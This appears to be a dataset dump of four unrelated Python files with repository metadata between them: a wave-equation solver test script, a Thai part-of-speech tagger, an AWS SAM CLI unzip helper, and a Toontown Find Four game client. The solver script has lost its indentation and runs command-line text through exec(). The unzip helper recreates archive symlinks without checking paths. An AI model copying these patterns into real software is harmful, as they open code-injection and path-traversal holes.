graphics.configure(coor=x)
graphics.plotcurve(u, legend='u(x,t=%9.4E)' % t, ps=0)
solutions.append(u.copy()) # save a copy!
if user_action is not None:
user_action(u, t) # call user's function
dt, x, cpu = solver(I, f, c, U_0, U_L, L, n, dt, tstop,
action_with_plot, version)
return solutions, x, dt, cpu
def test_solver_plug(plot=1, version='scalar', n=50):
L = 1
c = 1
tstop = 2
def I(x):
"""Plug profile as initial condition."""
if abs(x-L/2.0) > 0.1:
return 0
else:
return 1
def f(x,t):
return 0
def U_0(t):
return 0
def U_L(t):
return 0
def action(u, t, x):
pass
#print t, u
if plot:
g = graph(program='Gnuplot')
g.configure(ymin=-1.1, ymax=1.1)
else:
g = None
import time
t0 = time.clock()
solutions, x, dt, cpu = visualizer(I, f, c, U_0, U_L, L,
n, 0, tstop, user_action=None, version=version, graphics=g)
print 'CPU time: %s version =' % version, cpu
# check that first and last (if tstop=2) are equal:
if not allclose(solutions[0], solutions[-1],
atol=1.0E-10, rtol=1.0E-12):
print 'error in computations'
else:
print 'correct solution'
def test_solver1(N, version='scalar'):
"""
Very simple test case.
Store the solution at every N time level.
"""
def I(x): return sin(2*x*pi/L)
def f(x,t): return 0
solutions = []
# Need time_level_counter as global variable since
# it is assigned in the action function (that makes
# a variable local to that block otherwise).
# The manager class below provides a cleaner solution.
global time_level_counter
time_level_counter = 0
def action(u, t, x):
global time_level_counter
if time_level_counter % N == 0:
solutions.append(u.copy())
time_level_counter += 1
n = 100; tstop = 6; L = 10
dt, x, cpu = solver(I, f, 1.0, lambda t: 0, lambda t: 0,
L, n, 0, tstop,
user_action=action, version=version)
print 'CPU time:', cpu
print 'Max value in final u:', arrmax(solutions[-1])
class StoreSolution:
"""
Very simple test case.
Store the solution at every N time level.
"""
def __init__(self):
self.L = 10
def I(self, x): return sin(2*x*pi/self.L)
def f(self, x, t): return 0
def action(self, u, t, x):
if self.time_level_counter % self.N == 0:
self.solutions.append(u.copy())
self.time_level_counter += 1
def main(self, N=1, version='scalar'):
self.solutions = []
self.time_level_counter = 0
self.N = N
n = 6; tstop = 40
self.dt, self.x, self.cpu = \
solver(self.I, self.f, 1.0, lambda t: 0, lambda t: 0,
self.L, n, 0, tstop,
user_action=self.action, version=version)
def test_solver2(N, plot=True, version='scalar'):
s = StoreSolution()
s.main(N, version)
print 'CPU time:', s.cpu
if len(s.x) < 10: print s.solutions
if plot:
from CurveViz import graph
g = graph(program='Gnuplot', coor=s.x, ymax=1, ymin=-1)
for s in s.solutions:
g.plotcurve(s)
def test_solver1c(N, version='scalar'):
"""
As test_solver1, but use class for action function.
"""
def I(x): return sin(2*x*pi/L)
def f(x, t): return 0
class Action:
def __init__(self):
self.solutions = []
self.time_level_counter = 0
def __call__(self, u, x, t):
if self.time_level_counter % N == 0:
self.solutions.append(u.copy())
self.time_level_counter += 1
action = Action()
n = 100; tstop = 6; L = 10
dt, x, cpu = solver(I, f, 1.0, lambda t: 0, lambda t: 0,
L, n, 0, tstop,
user_action=action, version=version)
print 'CPU time:', cpu
print 'Max value in final u:', arrmax(action.solutions[-1])
class ExactSolution1:
def __init__(self):
self.L = 10
def exact(self, x, t):
m = 3.0
return cos(m*pi/self.L*t)*sin(m*pi/self.L*x)
def I(self, x): return self.exact(x, 0)
def f(self, x, t): return 0
def U_0(self, t): return self.exact(0, t)
def U_L(self, t): return self.exact(self.L, t)
def action(self, u, t, x):
e = u - self.exact(x, t)
self.errors.append(sqrt(dot(e,e))) # store norm of e
def main(self, n, version='scalar'):
self.errors = []
tstop = 10
self.dt, self.x, self.cpu = \
solver(self.I, self.f, 1.0, self.U_0,
lambda t: self.exact(self.L, t),
self.L, n, 0, tstop,
user_action=self.action, version=version)
def test_solver3(version='scalar'):
s = ExactSolution1()
s.main(5, version)
print 'Max error:', max(s.errors)
if __name__ == '__main__':
if len(sys.argv) < 2:
print """Usage %s test_solver_plug 1 "'vectorized'" """ % \
sys.argv[0]
sys.exit(0)
cmd = '%s(%s)' % (sys.argv[1], ', '.join(sys.argv[2:]))
print cmd
exec(cmd)
|
59e118c7dcb6b8b6ba205483a8aea95756de88d7
|
b8c1ee67d1e770ca0a49771751df8cef6a5b6935
|
/pythainlp/tag/pos_tag.py
|
90a0d778862bd8e8a56b939e910aebae419ce25a
|
[
"Apache-2.0",
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"CC-BY-4.0"
] |
permissive
|
PyThaiNLP/pythainlp
|
2922c6e4723f1828d39793eb722dc163d141c4f2
|
43cd4f8029d2d9b0d3fd1e4cc30faab7e8052eeb
|
refs/heads/dev
| 2023-09-04T03:42:44.488153
| 2023-08-20T04:10:28
| 2023-08-20T04:10:28
| 61,813,823
| 761
| 264
|
Apache-2.0
| 2023-08-20T04:10:30
| 2016-06-23T14:57:26
|
Python
|
UTF-8
|
Python
| false
| false
| 7,618
|
py
|
pos_tag.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016-2023 PyThaiNLP Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Tuple
def pos_tag(
words: List[str], engine: str = "perceptron", corpus: str = "orchid"
) -> List[Tuple[str, str]]:
"""
Marks words with part-of-speech (POS) tags, such as 'NOUN' and 'VERB'.
:param list words: a list of tokenized words
:param str engine:
* *perceptron* - perceptron tagger (default)
* *unigram* - unigram tagger
* *wangchanberta* - wangchanberta model.
        * *tltk* - TLTK: Thai Language Toolkit (supports the TNC corpus only;\
        if another corpus is chosen, it falls back to TNC.)
    :param str corpus: the corpus used to create the language model for the tagger
* *orchid* - `ORCHID \
<https://www.academia.edu/9127599/Thai_Treebank>`_ corpus, \
text from Thai academic articles (default)
* *orchid_ud* - ORCHID text, with tags mapped to Universal POS tags
* *blackboard* - `blackboard treebank <https://bitbucket.org/kaamanita/blackboard-treebank/src/master/>`_
* *blackboard_ud* - blackboard text, with tags mapped to Universal POS tag \
from `Universal Dependencies <https://universaldependencies.org/>`
* *pud* - `Parallel Universal Dependencies (PUD)\
<https://github.com/UniversalDependencies/UD_Thai-PUD>`_ \
treebanks, natively use Universal POS tags
* *tnc* - Thai National Corpus (support tltk engine only)
:return: a list of tuples (word, POS tag)
:rtype: list[tuple[str, str]]
:Example:
Tag words with corpus `orchid` (default)::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words)
# output:
# [('ฉัน', 'PPRS'), ('มี', 'VSTA'), ('ชีวิต', 'NCMN'), ('รอด', 'NCMN'),
# ('ใน', 'RPRE'), ('อาคาร', 'NCMN'), ('หลบภัย', 'NCMN'),
# ('ของ', 'RPRE'), ('นายก', 'NCMN'), ('เชอร์ชิล', 'NCMN')]
Tag words with corpus `orchid_ud`::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words, corpus='orchid_ud')
# output:
# [('ฉัน', 'PROPN'), ('มี', 'VERB'), ('ชีวิต', 'NOUN'),
# ('รอด', 'NOUN'), ('ใน', 'ADP'), ('อาคาร', 'NOUN'),
# ('หลบภัย', 'NOUN'), ('ของ', 'ADP'), ('นายก', 'NOUN'),
# ('เชอร์ชิล', 'NOUN')]
Tag words with corpus `pud`::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words, corpus='pud')
# [('ฉัน', 'PRON'), ('มี', 'VERB'), ('ชีวิต', 'NOUN'), ('รอด', 'VERB'),
# ('ใน', 'ADP'), ('อาคาร', 'NOUN'), ('หลบภัย', 'NOUN'),
# ('ของ', 'ADP'), ('นายก', 'NOUN'), ('เชอร์ชิล', 'PROPN')]
Tag words with different engines including *perceptron* and *unigram*::
from pythainlp.tag import pos_tag
words = ['เก้าอี้','มี','จำนวน','ขา', ' ', '=', '3']
pos_tag(words, engine='perceptron', corpus='orchid')
# output:
# [('เก้าอี้', 'NCMN'), ('มี', 'VSTA'), ('จำนวน', 'NCMN'),
# ('ขา', 'NCMN'), (' ', 'PUNC'),
# ('=', 'PUNC'), ('3', 'NCNM')]
pos_tag(words, engine='unigram', corpus='pud')
# output:
# [('เก้าอี้', None), ('มี', 'VERB'), ('จำนวน', 'NOUN'), ('ขา', None),
# ('<space>', None), ('<equal>', None), ('3', 'NUM')]
"""
if not words:
return []
_support_corpus = [
"blackboard",
"blackboard_ud",
"orchid",
"orchid_ud",
"pud",
]
if engine == "perceptron" and corpus in _support_corpus:
from pythainlp.tag.perceptron import tag as tag_
elif engine == "tltk":
from pythainlp.tag.tltk import pos_tag as tag_
corpus = "tnc"
elif engine == "unigram" and corpus in _support_corpus: # default
from pythainlp.tag.unigram import tag as tag_
else:
raise ValueError(
"pos_tag not support {0} engine or {1} corpus.".format(
engine, corpus
)
)
word_tags = tag_(words, corpus=corpus)
return word_tags
def pos_tag_sents(
sentences: List[List[str]],
engine: str = "perceptron",
corpus: str = "orchid",
) -> List[List[Tuple[str, str]]]:
"""
Marks sentences with part-of-speech (POS) tags.
:param list sentences: a list of lists of tokenized words
:param str engine:
* *perceptron* - perceptron tagger (default)
* *unigram* - unigram tagger
        * *tltk* - TLTK: Thai Language Toolkit (supports the TNC corpus only;\
        if another corpus is chosen, it falls back to TNC.)
    :param str corpus: the corpus used to create the language model for the tagger
* *orchid* - `ORCHID \
<https://www.academia.edu/9127599/Thai_Treebank>`_ corpus, \
text from Thai academic articles (default)
* *orchid_ud* - ORCHID text, with tags mapped to Universal POS tags
* *blackboard* - `blackboard treebank <https://bitbucket.org/kaamanita/blackboard-treebank/src/master/>`_
* *blackboard_ud* - blackboard text, with tags mapped to Universal POS tag \
from `Universal Dependencies <https://universaldependencies.org/>`
* *pud* - `Parallel Universal Dependencies (PUD)\
<https://github.com/UniversalDependencies/UD_Thai-PUD>`_ \
treebanks, natively use Universal POS tags
* *tnc* - Thai National Corpus (support tltk engine only)
:return: a list of lists of tuples (word, POS tag)
:rtype: list[list[tuple[str, str]]]
:Example:
Labels POS for two sentences::
from pythainlp.tag import pos_tag_sents
sentences = [['เก้าอี้','มี','3','ขา'], \\
['นก', 'บิน', 'กลับ', 'รัง']]
        pos_tag_sents(sentences, corpus='pud')
# output:
# [[('เก้าอี้', 'PROPN'), ('มี', 'VERB'), ('3', 'NUM'),
# ('ขา', 'NOUN')], [('นก', 'NOUN'), ('บิน', 'VERB'),
# ('กลับ', 'VERB'), ('รัง', 'NOUN')]]
"""
if not sentences:
return []
return [pos_tag(sent, engine=engine, corpus=corpus) for sent in sentences]
|
1fd73119e18169a82a74f68820234197bfd95881
|
10cb11f83e1c8b51b9d72c28d6259a56ff1a97c8
|
/samcli/local/lambdafn/zip.py
|
05c6aa0eb2b7658639a97cfebb7ec11704021ffb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"BSD-2-Clause"
] |
permissive
|
aws/aws-sam-cli
|
6d4411aacf7f861e75e5cf4882a32858797a276d
|
b297ff015f2b69d7c74059c2d42ece1c29ea73ee
|
refs/heads/develop
| 2023-08-30T23:28:36.179932
| 2023-08-30T21:58:26
| 2023-08-30T21:58:26
| 92,205,085
| 1,402
| 470
|
Apache-2.0
| 2023-09-14T21:14:23
| 2017-05-23T18:16:23
|
Python
|
UTF-8
|
Python
| false
| false
| 4,247
|
py
|
zip.py
|
"""
Helper methods to unzip an archive preserving the file permissions. Python's zipfile module does not yet support
this feature natively (https://bugs.python.org/issue15795).
"""
import logging
import os
import zipfile
LOG = logging.getLogger(__name__)
S_IFLNK = 0xA
def _is_symlink(file_info):
"""
Check the upper 4 bits of the external attribute for a symlink.
See: https://unix.stackexchange.com/questions/14705/the-zip-formats-external-file-attribute
Parameters
----------
file_info : zipfile.ZipInfo
The ZipInfo for a ZipFile
Returns
-------
bool
A response regarding whether the ZipInfo defines a symlink or not.
"""
    return (file_info.external_attr >> 28) == S_IFLNK
def _extract(file_info, output_dir, zip_ref):
"""
Unzip the given file into the given directory while preserving file permissions in the process.
Parameters
----------
file_info : zipfile.ZipInfo
The ZipInfo for a ZipFile
output_dir : str
        Path to the directory where it should be unzipped to
zip_ref : zipfile.ZipFile
The ZipFile we are working with.
Returns
-------
string
Returns the target path the Zip Entry was extracted to.
"""
# Handle any regular file/directory entries
if not _is_symlink(file_info):
return zip_ref.extract(file_info, output_dir)
source = zip_ref.read(file_info.filename).decode("utf8")
link_name = os.path.normpath(os.path.join(output_dir, file_info.filename))
# make leading dirs if needed
leading_dirs = os.path.dirname(link_name)
if not os.path.exists(leading_dirs):
os.makedirs(leading_dirs)
# If the link already exists, delete it or symlink() fails
if os.path.lexists(link_name):
os.remove(link_name)
# Create a symbolic link pointing to source named link_name.
os.symlink(source, link_name)
return link_name
def unzip(zip_file_path, output_dir, permission=None):
"""
Unzip the given file into the given directory while preserving file permissions in the process.
Parameters
----------
zip_file_path : str
Path to the zip file
output_dir : str
        Path to the directory where it should be unzipped to
permission : int
Permission to set in an octal int form
"""
with zipfile.ZipFile(zip_file_path, "r") as zip_ref:
# For each item in the zip file, extract the file and set permissions if available
for file_info in zip_ref.infolist():
extracted_path = _extract(file_info, output_dir, zip_ref)
# If the extracted_path is a symlink, do not set the permissions. If the target of the symlink does not
# exist, then os.chmod will fail with FileNotFoundError
if not os.path.islink(extracted_path):
_set_permissions(file_info, extracted_path)
_override_permissions(extracted_path, permission)
if not os.path.islink(extracted_path):
_override_permissions(output_dir, permission)
def _override_permissions(path, permission):
"""
Forcefully override the permissions on the path
Parameters
----------
path str
        Path of the file or directory whose permissions should be overridden
permission octal int
Permission to set
"""
if permission:
os.chmod(path, permission)
def _set_permissions(zip_file_info, extracted_path):
"""
Sets permissions on the extracted file by reading the ``external_attr`` property of given file info.
Parameters
----------
zip_file_info : zipfile.ZipInfo
Object containing information about a file within a zip archive
extracted_path : str
Path where the file has been extracted to
"""
    # Permission information is stored in the upper two bytes of external_attr.
permission = zip_file_info.external_attr >> 16
if not permission:
# Zips created on certain Windows machines, however, might not have any permission information on them.
# Skip setting a permission on these files.
LOG.debug("File %s in zipfile does not have permission information", zip_file_info.filename)
return
os.chmod(extracted_path, permission)
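# Example usage (a sketch; the archive path and permission bits below are
# placeholders):
#
#   unzip("function.zip", "/tmp/unzipped-function", permission=0o700)
#
# Symlink entries inside the archive are re-created with os.symlink rather
# than extracted as regular files, and no permissions are set on them.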
|
bc7b8bd2bda6d2f23083a19063bd5c1b985df7fe
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/safezone/DistributedFindFour.py
|
c43ac0920dbe5f5567fe7adbe6bbfa926d4445d0
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 33,793
|
py
|
DistributedFindFour.py
|
from panda3d.core import *
from panda3d.otp import WhisperPopup
from direct.distributed.ClockDelta import *
from direct.task.Task import Task
from direct.interval.IntervalGlobal import *
from .TrolleyConstants import *
from direct.gui.DirectGui import *
from toontown.toonbase import TTLocalizer
from direct.distributed import DistributedNode
from direct.distributed.ClockDelta import globalClockDelta
from .ChineseCheckersBoard import ChineseCheckersBoard
from direct.fsm import ClassicFSM, State
from direct.fsm import StateData
from toontown.toonbase.ToontownTimer import ToontownTimer
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.showbase import PythonUtil
from random import *
class DistributedFindFour(DistributedNode.DistributedNode):
def __init__(self, cr):
NodePath.__init__(self, 'DistributedFindFour')
DistributedNode.DistributedNode.__init__(self, cr)
self.cr = cr
self.reparentTo(render)
self.boardNode = loader.loadModel('phase_6/models/golf/findfour_game.bam')
self.boardNode.reparentTo(self)
        self.board = [[0, 0, 0, 0, 0, 0, 0],
                      [0, 0, 0, 0, 0, 0, 0],
                      [0, 0, 0, 0, 0, 0, 0],
                      [0, 0, 0, 0, 0, 0, 0],
                      [0, 0, 0, 0, 0, 0, 0],
                      [0, 0, 0, 0, 0, 0, 0]]
self.exitButton = None
self.inGame = False
self.waiting = True
self.startButton = None
self.playerNum = None
self.turnText = None
self.isMyTurn = False
self.wantTimer = True
self.leaveButton = None
self.screenText = None
self.turnText = None
self.exitButton = None
self.numRandomMoves = 0
self.blinker = Sequence()
self.playersTurnBlinker = Sequence()
self.yourTurnBlinker = Sequence()
self.winningSequence = Sequence()
self.moveSequence = Sequence()
self.moveList = []
self.mySquares = []
self.playerSeats = None
self.moveCol = None
self.move = None
self.accept('mouse1', self.mouseClick)
self.traverser = base.cTrav
self.pickerNode = CollisionNode('mouseRay')
self.pickerNP = camera.attachNewNode(self.pickerNode)
self.pickerNode.setFromCollideMask(BitMask32(4096))
self.pickerRay = CollisionRay()
self.pickerNode.addSolid(self.pickerRay)
self.myHandler = CollisionHandlerQueue()
self.traverser.addCollider(self.pickerNP, self.myHandler)
self.buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
        self.upButton = self.buttonModels.find('**/InventoryButtonUp')
self.downButton = self.buttonModels.find('**/InventoryButtonDown')
self.rolloverButton = self.buttonModels.find('**/InventoryButtonRollover')
self.clockNode = ToontownTimer()
self.clockNode.setPos(1.16, 0, -0.83)
self.clockNode.setScale(0.3)
self.clockNode.hide()
self.tintConstant = Vec4(0.25, 0.25, 0.25, 0)
self.ghostConstant = Vec4(0, 0, 0, 0.5)
self.knockSound = base.loader.loadSfx('phase_5/audio/sfx/GUI_knock_1.ogg')
self.clickSound = base.loader.loadSfx('phase_3/audio/sfx/GUI_balloon_popup.ogg')
self.moveSound = base.loader.loadSfx('phase_6/audio/sfx/CC_move.ogg')
self.accept('stoppedAsleep', self.handleSleep)
self.fsm = ClassicFSM.ClassicFSM('ChineseCheckers', [State.State('waitingToBegin', self.enterWaitingToBegin, self.exitWaitingToBegin, ['playing', 'gameOver']), State.State('playing', self.enterPlaying, self.exitPlaying, ['gameOver']), State.State('gameOver', self.enterGameOver, self.exitGameOver, ['waitingToBegin'])], 'waitingToBegin', 'waitingToBegin')
startLoc = self.boardNode.find('**/locators')
self.locatorList = startLoc.getChildren()
self.startingPositions = self.locatorList.pop(0)
self.startingPositions = self.startingPositions.getChildren()
instancePiece = self.boardNode.find('**/pieces')
tempList = []
for x in range(7):
self.startingPositions[x].setTag('StartLocator', '%d' % x)
collNode = CollisionNode('startpicker%d' % x)
collNode.setIntoCollideMask(BitMask32(4096))
tempList.append(self.startingPositions[x].attachNewNode(collNode))
tempList[x].node().addSolid(CollisionTube(0, 0, 0.23, 0, 0, -.23, 0.2))
for z in self.startingPositions:
y = instancePiece.copyTo(z)
for val in y.getChildren():
val.hide()
tempList = []
for x in range(42):
self.locatorList[x].setTag('GamePeiceLocator', '%d' % x)
collNode = CollisionNode('startpicker%d' % x)
collNode.setIntoCollideMask(BitMask32(4096))
tempList.append(self.locatorList[x].attachNewNode(collNode))
tempList[x].node().addSolid(CollisionSphere(0, 0, 0, 0.2))
for z in self.locatorList:
y = instancePiece.copyTo(z)
for val in y.getChildren():
val.hide()
dummyHide = instancePiece.getParent().attachNewNode('DummyHider')
instancePiece.reparentTo(dummyHide)
dummyHide.hide()
return
def setName(self, name):
self.name = name
def announceGenerate(self):
DistributedNode.DistributedNode.announceGenerate(self)
if self.table.fsm.getCurrentState().getName() != 'observing':
if base.localAvatar.doId in self.table.tableState:
self.seatPos = self.table.tableState.index(base.localAvatar.doId)
if self.seatPos <= 2:
for x in self.startingPositions:
x.setH(0)
for x in self.locatorList:
x.setH(0)
else:
for x in self.startingPositions:
x.setH(180)
for x in self.locatorList:
x.setH(180)
self.moveCameraForGame()
else:
self.seatPos = self.table.seatBumpForObserve
if self.seatPos > 2:
for x in self.startingPositions:
x.setH(180)
for x in self.locatorList:
x.setH(180)
self.moveCameraForGame()
def handleSleep(self, task = None):
if self.fsm.getCurrentState().getName() == 'waitingToBegin':
self.exitButtonPushed()
if task != None:
            return task.done
return
def setTableDoId(self, doId):
self.tableDoId = doId
self.table = self.cr.doId2do[doId]
self.table.setTimerFunc(self.startButtonPushed)
self.fsm.enterInitialState()
self.table.setGameDoId(self.doId)
def disable(self):
DistributedNode.DistributedNode.disable(self)
if self.leaveButton:
self.leaveButton.destroy()
            self.leaveButton = None
if self.screenText:
self.screenText.destroy()
self.screenText = None
if self.turnText:
self.turnText.destroy()
self.turnText = None
self.clockNode.stop()
self.clockNode.hide()
self.ignore('mouse1')
self.ignore('stoppedAsleep')
self.fsm = None
taskMgr.remove('playerTurnTask')
return
def delete(self):
DistributedNode.DistributedNode.delete(self)
self.table.gameDoId = None
self.table.game = None
if self.exitButton:
self.exitButton.destroy()
if self.startButton:
self.startButton.destroy()
self.clockNode.stop()
self.clockNode.hide()
self.table.startButtonPushed = None
self.ignore('mouse1')
self.ignore('stoppedAsleep')
self.fsm = None
self.table = None
self.winningSequence.finish()
taskMgr.remove('playerTurnTask')
return
def getTimer(self):
self.sendUpdate('requestTimer', [])
def setTimer(self, timerEnd):
if self.fsm.getCurrentState() != None and self.fsm.getCurrentState().getName() == 'waitingToBegin' and not self.table.fsm.getCurrentState().getName() == 'observing':
self.clockNode.stop()
time = globalClockDelta.networkToLocalTime(timerEnd)
timeLeft = int(time - globalClock.getRealTime())
if timeLeft > 0 and timerEnd != 0:
if timeLeft > 60:
timeLeft = 60
self.clockNode.setPos(1.16, 0, -0.83)
self.clockNode.countdown(timeLeft, self.startButtonPushed)
self.clockNode.show()
else:
self.clockNode.stop()
self.clockNode.hide()
return
def setTurnTimer(self, turnEnd):
if self.fsm.getCurrentState() != None and self.fsm.getCurrentState().getName() == 'playing':
self.clockNode.stop()
time = globalClockDelta.networkToLocalTime(turnEnd)
timeLeft = int(time - globalClock.getRealTime())
if timeLeft > 0:
self.clockNode.setPos(0.64, 0, -0.27)
self.clockNode.countdown(timeLeft, self.doRandomMove)
self.clockNode.show()
return
def gameStart(self, playerNum):
if playerNum != 255:
self.playerNum = playerNum
if self.playerNum == 1:
self.playerColorString = 'Red'
else:
self.playerColorString = 'Yellow'
self.moveCameraForGame()
self.fsm.request('playing')
def sendTurn(self, playersTurn):
if self.fsm.getCurrentState().getName() == 'playing':
if playersTurn == self.playerNum:
self.isMyTurn = True
taskMgr.add(self.turnTask, 'playerTurnTask')
self.enableTurnScreenText(playersTurn)
def illegalMove(self):
self.exitButtonPushed()
def moveCameraForGame(self):
if self.table.cameraBoardTrack.isPlaying():
self.table.cameraBoardTrack.pause()
rotation = 0
if self.seatPos <= 2:
position = self.table.seats[1].getPos()
position = position + Vec3(0, -8, 12.8)
            ival = LerpPosHprInterval(camera, 2, position, Vec3(0, -38, 0), camera.getPos(), camera.getHpr())
        else:
            position = self.table.seats[4].getPos()
            position = position + Vec3(0, -8, 12.8)
            if camera.getH() < 0:
                ival = LerpPosHprInterval(camera, 2, position, Vec3(-180, -20, 0), camera.getPos(), camera.getHpr())
            else:
                ival = LerpPosHprInterval(camera, 2, position, Vec3(180, -20, 0), camera.getPos(), camera.getHpr())
        ival.start()
def enterWaitingToBegin(self):
if self.table.fsm.getCurrentState().getName() != 'observing':
self.enableExitButton()
self.enableStartButton()
def exitWaitingToBegin(self):
if self.exitButton:
self.exitButton.destroy()
self.exitButton = None
if self.startButton:
self.startButton.destroy()
            self.startButton = None
self.clockNode.stop()
self.clockNode.hide()
return
def enterPlaying(self):
self.inGame = True
self.enableScreenText()
if self.table.fsm.getCurrentState().getName() != 'observing':
self.enableLeaveButton()
def exitPlaying(self):
self.inGame = False
if self.leaveButton:
self.leaveButton.destroy()
            self.leaveButton = None
self.playerNum = None
if self.screenText:
self.screenText.destroy()
self.screenText = None
if self.turnText:
self.turnText.destroy()
self.turnText = None
self.clockNode.stop()
self.clockNode.hide()
return
def enterGameOver(self):
pass
def exitGameOver(self):
pass
def exitWaitCountdown(self):
self.__disableCollisions()
self.ignore('trolleyExitButton')
self.clockNode.reset()
def enableExitButton(self):
self.exitButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersGetUpButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.23), text_scale=0.8, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.8), scale=0.15, command=lambda self = self: self.exitButtonPushed())
return
def enableScreenText(self):
defaultPos = (-.7, -0.29)
if self.playerNum == 1:
message = 'You are Red'
color = Vec4(1, 0, 0, 1)
elif self.playerNum == 2:
message = 'You are Yellow'
color = Vec4(1, 1, 0, 1)
else:
message = TTLocalizer.CheckersObserver
color = Vec4(0, 0, 0, 1)
self.screenText = OnscreenText(text=message, pos=defaultPos, scale=0.1, fg=color, align=TextNode.ACenter, mayChange=1)
def enableStartButton(self):
self.startButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersStartButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.23), text_scale=0.6, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.57), scale=0.15, command=lambda self = self: self.startButtonPushed())
return
def enableLeaveButton(self):
self.leaveButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersQuitButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.13), text_scale=0.5, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.8), scale=0.15, command=lambda self = self: self.exitButtonPushed())
return
def enableTurnScreenText(self, player):
        playerOrder = [1, 4, 2, 5, 3, 6]
message1 = TTLocalizer.CheckersIts
if self.turnText != None:
self.turnText.destroy()
if player == self.playerNum:
message2 = TTLocalizer.ChineseCheckersYourTurn
color = (0, 0, 0, 1)
elif player == 1:
message2 = "Red's Turn"
color = (1, 0, 0, 1)
elif player == 2:
message2 = "Yellow's Turn"
color = (1, 1, 0, 1)
self.turnText = OnscreenText(text=message1 + message2, pos=(-0.7, -0.39), scale=0.092, fg=color, align=TextNode.ACenter, mayChange=1)
return
def startButtonPushed(self):
self.sendUpdate('requestBegin')
self.startButton.hide()
self.clockNode.stop()
self.clockNode.hide()
def exitButtonPushed(self):
self.fsm.request('gameOver')
self.table.fsm.request('off')
self.clockNode.stop()
self.clockNode.hide()
self.table.sendUpdate('requestExit')
def mouseClick(self):
messenger.send('wakeup')
if self.isMyTurn == True and self.inGame == True and not self.moveSequence.isPlaying():
if self.moveCol != None:
self.d_requestMove(self.moveCol)
self.moveCol = None
self.isMyTurn = False
taskMgr.remove('playerTurnTask')
return
def handleClicked(self, index):
pass
def turnTask(self, task):
if base.mouseWatcherNode.hasMouse() == False:
return task.cont
if self.isMyTurn == False:
return task.cont
if self.moveSequence.isPlaying():
return task.cont
mpos = base.mouseWatcherNode.getMouse()
self.pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY())
self.traverser.traverse(render)
if self.myHandler.getNumEntries() > 0:
self.myHandler.sortEntries()
pickedObj = self.myHandler.getEntry(0).getIntoNodePath()
pickedObj = pickedObj.getNetTag('StartLocator')
if pickedObj:
colVal = int(pickedObj)
if colVal == self.moveCol:
return task.cont
if self.board[0][colVal] == 0:
if self.moveCol != None:
for x in self.startingPositions[self.moveCol].getChild(1).getChildren():
x.hide()
self.moveCol = colVal
if self.playerNum == 1:
self.startingPositions[self.moveCol].getChild(1).getChild(2).show()
elif self.playerNum == 2:
self.startingPositions[self.moveCol].getChild(1).getChild(3).show()
return task.cont
def d_requestMove(self, moveCol):
self.sendUpdate('requestMove', [moveCol])
def setGameState(self, tableState, moveCol, movePos, turn):
messenger.send('wakeup')
if self.table.fsm.getCurrentState().getName() == 'observing':
isBlank = True
for x in range(7):
if self.board[5][x] != 0:
isBlank = False
break
gameBlank = True
for x in range(7):
if tableState[5][x] != 0:
gameBlank = False
break
if isBlank == True and gameBlank == False:
for x in range(6):
for y in range(7):
self.board[x][y] = tableState[x][y]
self.updateGameState()
return
if moveCol == 0 and movePos == 0 and turn == 0:
for x in range(6):
for y in range(7):
self.board[x][y] = tableState[x][y]
self.updateGameState()
else:
self.animatePeice(tableState, moveCol, movePos, turn)
didIWin = self.checkForWin()
if didIWin != None:
self.sendUpdate('requestWin', [didIWin])
return
def updateGameState(self):
for x in range(6):
for y in range(7):
for z in self.locatorList[x * 7 + y].getChild(1).getChildren():
z.hide()
for x in range(6):
for y in range(7):
state = self.board[x][y]
if state == 1:
self.locatorList[x * 7 + y].getChild(1).getChild(0).show()
elif state == 2:
self.locatorList[x * 7 + y].getChild(1).getChild(1).show()
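    # Note on indexing (restating the convention used throughout this class):
    # the board is 6 rows x 7 columns, and self.locatorList holds the same
    # grid flattened row-major, so board cell (x, y) maps to locator index
    # x * 7 + y.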
def checkForWin(self):
for x in range(6):
for y in range(7):
if self.board[x][y] == self.playerNum:
if self.checkHorizontal(x, y, self.playerNum) == True:
return [x, y]
elif self.checkVertical(x, y, self.playerNum) == True:
return [x, y]
elif self.checkDiagonal(x, y, self.playerNum) == True:
return [x, y]
return None
